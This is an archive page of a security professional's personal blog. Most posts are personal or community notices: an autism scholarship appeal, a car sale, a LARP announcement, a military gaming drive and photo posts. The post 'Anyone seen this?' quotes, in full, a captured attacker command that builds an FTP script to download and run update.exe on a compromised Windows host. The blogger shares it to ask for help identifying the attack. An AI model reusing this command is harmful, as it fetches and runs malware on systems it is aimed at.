The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

Archive for the ‘Main Page’ Category

Autism Scholarship Program

Posted by Xavier Ashe on January 15, 2009

My two step sons, Jorge and Leo, are part of a Autism Scholarship Program that is being hosted by Myles-A-Part.   Myles-A-Part is partnering with two other Atlanta organizations to offer its first family therapy grants for families living with Autism.  Please take a few minutes a watch the video below.  If you or your company would like help our boys get the services they need, go to http://www.mylesapart.org/scholarship.html to get more information.

Autism: Hope & Help for the Journey (HD Version) from Matt Gibson on Vimeo.

Advertisements

Posted in Main Page, Personal Note | Leave a Comment »

You need a Mercedes Benz

Posted by Xavier Ashe on March 21, 2008

I am selling my Benz.  Who wants it?  $500 off the edmunds.com price by mentioning this blog.

2003 MERCEDES C320
Price:$18,268
Mileage:77,129
Color:Black
Doors:4
Features:
 Air Bag, Air Conditioning, Anti-Lock Brakes, CD player, Heated Seats,
Leather Interior, Power Seats,  Power Steering, Power Windows, Security
Features, Side Impact Air Bags, Sunroof, Traction Control
 
Additional Comments:
This car has served me well, but I am getting married and need to get a
bigger car (more kids!). It is priced to move. It's in near perfect
condition. This is a very fun drive. Give us a call to schedule a test
drive any time (we work from home). More details: AM/FM Stereo;
Multi-CD Changer; Cassette; Premium Audio System (Bose); 4-Wheel
Anti-Lock Brakes; Dual Control Air Conditioning; Alloy Wheels; Cruise
Control; Front And Rear Head Air Bags; Rear Window Defroster; Power
Seats; Leather Seats; Power Door Locks; Power Heated Mirrors; Power
Windows; Power Steering; Front And Rear Side Air Bags;
Sunroof/Moonroof; Tinted Glass; Power Tilt Wheel; Bucket Seats; Fog
Lights; Lighted Entry System; Automatic Climate Control; Memory Driver
And Passenger Seats; Power Telescopic Steering Wheel; Clock; Trip
Computer; Stability Control; Anti-Theft Alarm System; Rear Bench Seat;
Remote Trunk Release; Leather Steering Wheel Trim; Center Console;
Garage Door Opener; Keyless Entry System; Wood Interior Trim; 16 Inch
Wheels; 3.2L V6 SOHC 18V FI Engine; Tachometer; Traction Control; Audio
Steering Wheel Controls; Leather Shift Knob Trim; Intermittent Wipers;
Daytime Running Lights; Turn Signal Mirrors Contact Xavier Ashe
404-229-8905, xashe@digitribe.net

Posted in Main Page, Personal Note | Leave a Comment »

IP v4.5

Posted by Xavier Ashe on October 22, 2007

I posted a new photo to RandomPics.

Posted in Main Page | Leave a Comment »

This is why I work for IBM

Posted by Xavier Ashe on September 7, 2007

It’s every worker’s dream: take as much vacation time as
you want, on short notice, and don’t worry about your boss calling you
on it. Cut out early, make it a long weekend, string two weeks together
— as you like. No need to call in sick on a Friday so you can disappear
for a fishing trip. Just go; nobody’s keeping track.

That is essentially what goes on at I.B.M.,
one of the cornerstones of corporate America, where each of the 355,000
workers is entitled to three or more weeks of vacation. The company
does not keep track of who takes how much time or when, does not dole
out choice vacation times by seniority and does not let people carry
days off from year to year.

Instead, for the past few years,
employees at all levels have made informal arrangements with their
direct supervisors, guided mainly by their ability to get their work
done on time. Many people post their vacation plans on electronic
calendars that colleagues can view online, and they leave word about
how they can be reached in a pinch.

Well, one of the main reasons at least.  It worth the little bit of travel time my current position demands.  Read the full article at NY Times.

Posted in Main Page | Leave a Comment »

All Quiet on the Lazy Genius Front

Posted by Xavier Ashe on August 28, 2007

Sorry about the lack of post lately.  Been doing a bit of traveling and working on new products.  Tivoli Compliance Insight Manager (TCIM) is the product formerly known as Consul Insight Manager.  It compliments TSOM in many ways.  I also have been studying up on Tivoli Access Manager Enterprise Single Sign-on (TAM E-SSO).  And finally I've been playing with the new release of TSOM (version 4.1).  The beta program will be starting soon, so it's coming along great.  I can't wait to tell you all about it.

But I have bee neglectful of this fun little blog, so I'll try to crank up the posts again.  Thanks for all the emails asking where I have gone to.

Also, if you are coming to Dragon*Con, coming find the Paranoia LARP Table and say hello.

Posted in Main Page | Leave a Comment »

More Off Topic Fun!

Posted by Xavier Ashe on August 13, 2007

As I posted before, I am part of Digitribe Productions.  It is a local production company that does film, music, art, and gaming.  It's the creative side of a bunch of geeks, including me.  Well, we just completed another skit, a comedy this time, and posted it up on YouTube. Let me know what you think!

Posted in Main Page | Leave a Comment »

Announcing – The DRAGON CONspiracy

Posted by Xavier Ashe on July 20, 2007

Disclosure:  I am part of Digitribe Productions.  This is a bit off topic, but will prove to be good fun.  Click here for the original announcement.

Greetings Citizen!

I'm pleased to announce that DigiTribe Productions will be producing a Live-Action version of the popular Paranoia RPG at Dragon*Con 2007 in Atlanta, GA the weekend of August 31-September 3.  Digitribe Productions has brought you many fun games in the past including Night's Children and R.E.L.I.C., and also brought you Geekin'.

The game will run continuously from Friday night until Sunday evening with primary plot hours occurring Friday 1900-2100, Saturday 1300-1800, and Sunday 1300-1800. The Primary storyline will advance during these three session windows, however players are encouraged to continue game play throughout the day and night if they so wish.

The LARP system being used has been specially developed for this type of convention game and has been streamlined for ease of play, speedy resolutions, and quick learning curves.Registration for the game is $19.84 – and includes six lives (clones) of your assigned character. To pre-register please visit http://www.digitribe.net/paranoia. The game is written for a maximum of 200 players, so act now and get your name on The Computer's roll sheet.

The official game description is as follows:

– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
ATTENTION SELECTED CITIZENS

As you may be aware, for the last <CLASSIFIED/indigo> years, certain citizens have been selected for a relaxation experiment. This year, you have been selected for this honor. The computer requests that you report to the CON sector. Attendance is mandatory. Failure to attend is treason.

You are ordered to take two days of holiday. You will be taken off of Visomorpain for the duration. You will be given an extra dose of Xanitrick. All citizens WILL enjoy themselves. Computer-approved jumpsuits are not mandatory for this period. Citizens are encouraged to dress in festive costumes based on Computer-approved video dramas. Citizens MUST avoid work during this relaxation period. Citizens MUST accomplish all mandated tasks as normal. Happiness is mandatory.

<CLASSIFIED/red>
This “holiday” is essential to long-term evaluation of infrared response to adjustments in medical dosages and work schedule. CON sector will be sealed until infrared citizens return to normal parameters, so their “colorful antics” do not disturb other citizens. It is essential that you help collect data on infrared behavior during this period without interfering in their behavior.

This experiment may result in increased treasonous activity. You are required to report to the CON sector main Computer terminal for troubleshooting assignments. Troubleshooters will receive work assignments to uncover seditious activity. Failure to report will be regarded as treason. Refusal to work will be regarded as treason. Clearance Red and above citizens are not exempt from the prohibition against working during the experiment.

Due to a treasonous, communist attack on a local plant, Multicorder devices will not be available for requisition on the festival weekend. Since Multicorder records are very helpful in establishing treason beyond a shadow of a doubt, all troubleshooters are encouraged to bring personal Multicorder devices for use in missions during the experiment. Fines for possession of a Multicorder of unauthorized clearance will be waived for the duration of the experiment. Troubleshooters bringing personal Multicorders will be Commended. It is treasonous to use a Multicorder of a level beyond your clearance.

Posted in Main Page | Leave a Comment »

Anyone seen this?

Posted by Xavier Ashe on June 5, 2007

I've got a bastion hots that had vnc wide open.  I just got a connection.  It fired a ctrl-atl-del, opened a task manager, and ran cmd.exe.  It then executed the following command.  I was able to get a screen shot before the window disappeared, but it looked like the command was not successful.  The attackered disconnected immediately.  I have no extra users, but am downloading Helix right now to see if anything really happened.  I also have a pcap.  But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit

Posted in Main Page, Security | Leave a Comment »

Help the Roleplayers in the Military!

Posted by Xavier Ashe on April 19, 2007

When President Bush ordered troops to Iraq, he probably never imagined that he would be ultimately be responsible for what very well could be the very first D&D convention/game day ever held in a war zone. Ziggurat Con, being held June 9 from 1200 to 2100 hours at Camp Adder/Tallil Airbase, is open to all allied military personnel and civilian contractors in Iraq.

KBR and MWR (the army’s Morale Welfare & Recreation Department) have graciously allowed service members to use part of the Community Activity Center to hold the Game Day. The Ping Pong room will be set up for RPGs (Role-Playing Games, not to be confused with the rocket propelled grenades which share the same acronym), and the DVD Movie room will be playing Anime Movies all day in support of the event.

The largest problem with running a Con in Iraq, of course, is that there are no local stores or game publishers, and few game books on the post. Even dice are in short supply, with many soldiers breaking the unwritten taboo held by many gamers and sharing dice. Thankfully, many game publishers have also lent their support, and have agreed to supply game products to help the Con along. aethereal FORGE, Sovereign Press, Final Redoubt Press, Goodman Games, Paizo Publishing and Steve Jackson Games are among those that have thrown in their support for the convention. But Amberson indicated that the soldiers could definitely use more.

“This convention is currently in drastic need of prizes and giveaways for the troops,” he said. “Everything donated will go directly to the troops, or to MWR to use as loaner books for the soldiers.”

For more information, contact SPC David Amberson at the following address: david.amberson (at) iraq.centcom.mil

Donations can also be sent to SPC Amberson directly at the following address:

SPC David Amberson
A Co 86th Sig Bn
APO, AE 09331

They’re planning to run the following games (and will be happy to get additional games):
Babylon 5 RPG, Cyberpunk 2020, D&D, D&D RPGA, GURPS, Historic Miniatures Battles, Magic Tournament, MechWarrior Miniatures, Rifts, Shadowrun, Starship Troopers, White Wolf System-Vampire, White Wolf System-Werewolf, XCrawl

Got any game books crowding your shelves that you never use? Here's a great cause to donate them to. Spread the word.

Originally found here.

Posted in Main Page | Leave a Comment »

DocuColor Tracking Dot Decoding Guide

Posted by Xavier Ashe on February 5, 2007

This guide is part of the Machine
Identification Code Technology project
. It explains how to read the date, time,
and printer serial number from forensic tracking codes in a Xerox DocuColor color laser
printout. This information is the result of research by
Robert Lee, Seth Schoen, Patrick Murphy, Joel Alwen, and Andrew “bunnie” Huang. We
acknowledge the assistance of EFF supporters who have contributed sample printouts to give us
material to study. We are still looking for help in this research; we are asking
the public to submit test
sheets
or join
the printers mailing list
to participate in our reverse engineering efforts.

The DocuColor series prints a rectangular grid of 15 by 8 miniscule yellow dots on
every color page. The same grid is printed repeatedly over the entire page, but the
repetitions of the grid are offset slightly from one another so that each grid is
separated from the others. The grid is printed parallel to the edges of the page,
and the offset of the grid from the edges of the page seems to vary.
These dots encode up to 14 7-bit bytes of tracking information, plus row and
column parity for error correction. Typically, about four of these bytes were unused
(depending on printer model), giving 10 bytes of useful data. Below, we explain how
to extract serial number, date, and time from these dots. Following the explanation,
we implement the decoding process in an interactive computer
program
.

Read the full article from EFF.

Posted in Main Page | Leave a Comment »

Nero's Qality Team

Posted by Xavier Ashe on January 30, 2007

I posted a new photo to RandomPics.  I was trying to burn an ISO with Nero.  It crashed and gave me a nice
alert.  Their system is going to send an alert to the Nero qality team.  Good stuff.

Posted in Main Page | Leave a Comment »

Vista pwen3d

Posted by Xavier Ashe on January 23, 2007

I posted a new photo to RandomPics.

Posted in Main Page | Leave a Comment »

Welcome!

Posted by Xavier Ashe on January 1, 2007

Thank you stopping by The Lazy Genius, a security focused Blog from the security architect, Xavier Ashe
Here you will find an abundance of security information, much of which
cannot be found through normal news outlets.  This site is
intended for other security professionals and IT managers that are
responsible for their company's security.

Xavier is a security solutions architect with 14 years experience.  He is currently working for IBM Tivoli (formerly Micromuse), implementing the security products in the Tivoli suite, including the industry leading SIM tool, Tivoli Security Operations Manager (formerly NeuSecure).  In his job he sees every type of security tool on the market, and figures out how to translate raw data into business objectives.  While on his travels, he blogs here with industry news, underground news, and personal experiences.

There are several ways to ways to read this web site.  The
information is categorized into subcategories.  You can visit via
a web browser to the Main Page, which includes all subcategories.  You can also visit just one of the subcategories by clicking on a folder on the left panel.  If you have an RSS reader, also known as News Aggregators, you can subscribe to The Lazy Genius.  You can also subscribe to the subcategories:  like Security Posts, For Fun, and Other Technology.

Former
customers of his include: Yahoo, eBay, Barnes and Nobles, State of
Georgia, Home Depot, FBI, MGIC, plus many others.  You can review
his security experience in the Security Overview or Work History
documents. You can also view his LinkedIn Profile.  

Thanks for stopping by, and feel free to leave a comment here or anywhere on the site.  I look forward to hearing from you.

Posted in Main Page | Leave a Comment »

Good Security Warning

Posted by Xavier Ashe on July 12, 2006

I posted a new photo to RandomPics.

Posted in Main Page | Leave a Comment »

Panoramic of Edmonton, Canada

Posted by Xavier Ashe on May 30, 2006

I posted a new photo to RandomPics.

Posted in Main Page | Leave a Comment »

Audrey in a Bikini

Posted by Xavier Ashe on May 28, 2006

I posted a new photo to Audrey.

Posted in Main Page | Leave a Comment »

IT'S ALIVE!

Posted by Xavier Ashe on May 19, 2006

The blog has been saved from Digg death.  I have bumped up the quota, thanks to the increased ad revenue generated from the Digg.  Thanks to all the new visitors and I hope you keep coming by!

Posted in Main Page | Leave a Comment »

RFID Humor

Posted by Xavier Ashe on February 5, 2006

I posted a new photo to RandomPics.

Posted in Main Page | Leave a Comment »

Challenge- Response

Posted by Xavier Ashe on January 10, 2006

I posted a new photo to RandomPics.

Posted in Main Page | Leave a Comment »

I PASSED!

Posted by Xavier Ashe on December 29, 2005

I just got word that I passed the CISSP test.  I just have to get my endorsement in and get approved.  Overall, I did it in about a month.  Lots of cramming, but very little of it was new material for me.  It was just making sure I answered the way ISC(2) wanted me to answer it. 
With my new job, this has been a good week.

Posted in Main Page | Leave a Comment »

 
%d bloggers like this: